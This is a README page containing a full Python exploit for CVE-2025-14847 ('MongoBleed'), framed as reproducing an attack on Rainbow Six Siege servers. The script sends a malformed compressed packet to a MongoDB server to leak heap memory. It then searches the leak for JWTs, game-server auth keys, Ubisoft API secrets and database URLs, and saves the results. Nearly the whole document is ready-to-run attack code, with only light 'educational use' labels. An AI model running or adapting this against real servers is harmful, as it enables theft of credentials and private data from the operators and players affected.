README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2025-14847 (MongoBleed) - R6 Attack Vector PoC
Author: Security Research Team
License: MIT (Educational Use Only)
This tool demonstrates heap memory disclosure in MongoDB's zlib compression layer.
Simulates the suspected attack vector used against Rainbow Six Siege infrastructure.
"""
import socket
import struct
import zlib
import random
import sys
import argparse
import time
import re
import json
import base64
from typing import Dict, List, Tuple, Optional
from dataclasses import dataclass, asdict
from datetime import datetime
@dataclass
class LeakResult:
"""Container for memory leak analysis results"""
timestamp: str
target: str
bytes_leaked: int
patterns_found: Dict[str, List[str]]
success: bool
error: Optional[str] = None
class R6Exploit:
"""
CVE-2025-14847 Exploitation Framework
Target: MongoDB with zlib compression enabled
"""
# Pattern signatures for R6-specific artifacts
PATTERNS = {
"JWT_Token": rb"eyJ[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+",
"R6_Server_Auth": rb"R6S_SERVER_AUTH_[A-Z0-9]{32,}",
"R6_Analytics_Key": rb"R6S_ANALYTICS_KEY_[a-z0-9]{30,}",
"R6_Telemetry_Key": rb"R6S_TELEMETRY_KEY_[a-z0-9]{30,}",
"Ubisoft_API_Secret": rb"UPLAY_API_SECRET_[a-z0-9]{30,}",
"UUID": rb"[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}",
"MongoDB_URL": rb"mongodb://[a-zA-Z0-9_\-:@./]+",
"Internal_IP": rb"10\.\d{1,3}\.\d{1,3}\.\d{1,3}",
"Pro_Team": rb"(W7M Esports|FaZe Clan|Team Liquid|G2 Esports|FURIA)",
"Match_ID": rb"match_uuid_[a-f0-9\-]{36,}",
}
def __init__(self, target_ip: str, target_port: int = 27017,
leak_size: int = 1048576, timeout: int = 10):
self.target_ip = target_ip
self.target_port = target_port
self.leak_size = leak_size
self.timeout = timeout
self.sock = None
def _connect(self) -> bool:
"""Establish connection with exponential backoff retry"""
max_retries = 3
for attempt in range(max_retries):
try:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(self.timeout)
self.sock.connect((self.target_ip, self.target_port))
return True
except (socket.timeout, ConnectionRefusedError) as e:
if attempt < max_retries - 1:
wait_time = 2 ** attempt
print(f"[!] Connection attempt {attempt + 1} failed, retrying in {wait_time}s...")
time.sleep(wait_time)
else:
print(f"[-] Connection failed after {max_retries} attempts: {e}")
return False
except Exception as e:
print(f"[-] Unexpected connection error: {e}")
return False
def _close(self):
"""Safely close socket connection"""
if self.sock:
try:
self.sock.close()
except:
pass
self.sock = None
def build_malformed_packet(self) -> Tuple[bytes, int]:
"""
Construct malicious OP_COMPRESSED packet
Vulnerability: MongoDB allocates buffer based on uncompressedSize
without validating it matches actual decompressed data length.
"""
# Base payload: isMaster query (pre-auth check)
bson_payload = b'\x13\x00\x00\x00\x10isMaster\x00\x01\x00\x00\x00\x00'
op_query_header = struct.pack('<I', 0) + b'admin.$cmd\x00' + struct.pack('<ii', 0, -1)
original_msg = op_query_header + bson_payload
# Compress the small payload
compressed_body = zlib.compress(original_msg, level=9)
actual_size = len(original_msg)
print(f"[*] Actual decompressed size: {actual_size} bytes")
print(f"[*] Fake uncompressed size: {self.leak_size} bytes")
print(f"[*] Expected leak: ~{self.leak_size - actual_size} bytes of heap memory")
# Malicious OP_COMPRESSED message
op_compressed_data = (
struct.pack('<I', 2004) + # originalOpcode: OP_QUERY
struct.pack('<I', self.leak_size) + # MALICIOUS: Oversized claim
b'\x02' + # compressorId: zlib
compressed_body
)
# MongoDB wire protocol header
request_id = random.randint(10000, 99999)
op_code = 2012 # OP_COMPRESSED
total_len = 16 + len(op_compressed_data)
header = struct.pack('<iiii', total_len, request_id, 0, op_code)
return header + op_compressed_data, request_id
def check_vulnerability(self) -> bool:
"""
Non-intrusive probe to detect MongoDB and version
"""
print(f"\n{'='*60}")
print(f"[*] PROBE MODE: {self.target_ip}:{self.target_port}")
print(f"{'='*60}\n")
if not self._connect():
return False
try:
# Send standard uncompressed isMaster
op_query = struct.pack('<I', 0) + b'admin.$cmd\x00' + struct.pack('<ii', 0, -1) + \
b'\x13\x00\x00\x00\x10isMaster\x00\x01\x00\x00\x00\x00'
header = struct.pack('<iiii', 16 + len(op_query), random.randint(1, 999), 0, 2004)
self.sock.sendall(header + op_query)
# Parse response
resp_header = self.sock.recv(16)
if len(resp_header) < 16:
print("[-] Invalid response format")
return False
resp_len = struct.unpack('<i', resp_header[:4])[0]
resp_body = self.sock.recv(resp_len - 16)
# Extract version from BSON response
if b"version" in resp_body:
# Simple extraction (not full BSON parsing)
version_match = re.search(rb'version\x00.{1,50}?(\d+\.\d+\.\d+)', resp_body)
if version_match:
version = version_match.group(1).decode('utf-8')
print(f"[+] MongoDB {version} detected")
# Check if vulnerable
major, minor, patch = map(int, version.split('.'))
vulnerable = (
(major == 6 and minor == 0 and patch < 27) or
(major == 7 and minor == 0 and patch < 28) or
(major == 8 and minor == 0 and patch < 17) or
(major == 8 and minor == 2 and patch < 3) or
major < 6
)
if vulnerable:
print(f"[!] VULNERABLE to CVE-2025-14847")
else:
print(f"[+] Patched version (not vulnerable)")
return vulnerable
print("[+] MongoDB detected but version unknown")
return True
except Exception as e:
print(f"[-] Probe error: {e}")
return False
finally:
self._close()
def exploit(self, output_file: Optional[str] = None) -> Optional[LeakResult]:
"""
Execute memory leak attack
"""
print(f"\n{'='*60}")
print(f"[!] EXPLOIT MODE: {self.target_ip}:{self.target_port}")
print(f"{'='*60}\n")
if not self._connect():
return None
try:
# Send malicious packet
packet, req_id = self.build_malformed_packet()
print(f"[*] Sending malicious OP_COMPRESSED (ID: {req_id})...")
self.sock.sendall(packet)
# Receive response header
resp_header = self.sock.recv(16)
if not resp_header or len(resp_header) < 16:
print("[-] No response. Target may be patched or crashed.")
return LeakResult(
timestamp=datetime.now().isoformat(),
target=f"{self.target_ip}:{self.target_port}",
bytes_leaked=0,
patterns_found={},
success=False,
error="No server response"
)
resp_len, resp_id, resp_to, resp_opcode = struct.unpack('<iiii', resp_header)
print(f"[+] Server responded! Total message size: {resp_len} bytes")
# Receive leaked data with progress tracking
leaked_data = b''
remaining = resp_len - 16
print(f"[*] Downloading {remaining} bytes...", end='', flush=True)
while remaining > 0:
try:
chunk_size = min(8192, remaining)
chunk = self.sock.recv(chunk_size)
if not chunk:
break
leaked_data += chunk
remaining -= len(chunk)
# Progress indicator
if len(leaked_data) % 32768 == 0:
print(".", end='', flush=True)
except socket.timeout:
print("\n[!] Timeout during reception")
break
print(f"\n[+] Captured {len(leaked_data)} bytes")
# Analyze leaked memory
patterns_found = self._analyze_memory(leaked_data)
# Save raw dump if requested
if output_file:
with open(output_file, "wb") as f:
f.write(leaked_data)
print(f"[+] Raw dump saved: {output_file}")
result = LeakResult(
timestamp=datetime.now().isoformat(),
target=f"{self.target_ip}:{self.target_port}",
bytes_leaked=len(leaked_data),
patterns_found=patterns_found,
success=True
)
return result
except ConnectionResetError:
print("[-] Connection reset! Leak size may be too large.")
print(" Try reducing --leak-size (e.g., 65536)")
return None
except Exception as e:
print(f"[-] Exploit error: {e}")
return None
finally:
self._close()
def _analyze_memory(self, data: bytes) -> Dict[str, List[str]]:
"""
Heuristic pattern matching for R6 artifacts
"""
print(f"\n{'-'*60}")
print("[*] ANALYZING LEAKED MEMORY")
print(f"{'-'*60}\n")
# Strip null bytes for cleaner regex matching
clean_data = data.replace(b'\x00', b' ')
results = {}
total_findings = 0
for pattern_name, pattern_regex in self.PATTERNS.items():
matches = re.findall(pattern_regex, clean_data)
if matches:
unique_matches = list(set(matches))
results[pattern_name] = [
m.decode('utf-8', errors='ignore') for m in unique_matches
]
print(f"[+] {pattern_name}: {len(unique_matches)} unique")
for match in unique_matches[:3]: # Show max 3 samples
display = match.decode('utf-8', errors='ignore') if isinstance(match, bytes) else match
if len(display) > 80:
display = display[:77] + "..."
print(f" └─ {display}")
if len(unique_matches) > 3:
print(f" └─ ... and {len(unique_matches) - 3} more")
total_findings += len(unique_matches)
print()
if total_findings == 0:
print("[-] No high-value patterns detected")
print("[*] Dumping ASCII preview (last 512 bytes):")
preview = "".join(chr(b) if 32 <= b <= 126 else "." for b in data[-512:])
print(f" {preview[:80]}")
if len(preview) > 80:
print(f" {preview[80:160]}")
print(f"{'-'*60}\n")
print(f"[*] Total artifacts found: {total_findings}")
return results
def generate_report(self, result: LeakResult, output_file: str):
"""Generate JSON report of findings"""
report = asdict(result)
report['exploit_config'] = {
'leak_size': self.leak_size,
'timeout': self.timeout,
'cve': 'CVE-2025-14847'
}
with open(output_file, 'w') as f:
json.dump(report, f, indent=2)
print(f"[+] JSON report saved: {output_file}")
def main():
banner = """
╔══════════════════════════════════════════════════════════╗
║ CVE-2025-14847: MongoBleed R6 Attack Vector PoC ║
║ Target: MongoDB Zlib Compression Memory Disclosure ║
║ WARNING: Authorized Testing Only ║
╚══════════════════════════════════════════════════════════╝
"""
print(banner)
parser = argparse.ArgumentParser(
description="MongoDB CVE-2025-14847 Exploitation Tool",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
# Check if target is vulnerable
%(prog)s --target 127.0.0.1 --check
# Leak 64KB of memory
%(prog)s --target 127.0.0.1 --leak-size 65536 --out r6_leak.bin
# Full attack with JSON report
%(prog)s --target 10.0.0.5 --leak-size 1048576 --out dump.bin --report findings.json
"""
)
parser.add_argument("--target", required=True, help="Target MongoDB IP")
parser.add_argument("--port", type=int, default=27017, help="Target port (default: 27017)")
parser.add_argument("--leak-size", type=int, default=1048576,
help="Fake uncompressed size in bytes (default: 1MB)")
parser.add_argument("--timeout", type=int, default=10, help="Socket timeout (default: 10s)")
parser.add_argument("--check", action="store_true", help="Probe mode: detect vulnerability")
parser.add_argument("--out", help="Save raw memory dump to file")
parser.add_argument("--report", help="Generate JSON report of findings")
args = parser.parse_args()
# Input validation
if args.leak_size < 1024 or args.leak_size > 10485760: # 1KB to 10MB
print("[-] Error: leak-size must be between 1024 and 10485760 bytes")
sys.exit(1)
exploit = R6Exploit(
target_ip=args.target,
target_port=args.port,
leak_size=args.leak_size,
timeout=args.timeout
)
if args.check:
# Probe mode
is_vulnerable = exploit.check_vulnerability()
sys.exit(0 if is_vulnerable else 1)
else:
# Exploit mode
result = exploit.exploit(output_file=args.out)
if result and result.success:
if args.report:
exploit.generate_report(result, args.report)
# Exit with success if patterns found
sys.exit(0 if result.patterns_found else 2)
else:
sys.exit(1)
if __name__ == "__main__":
main()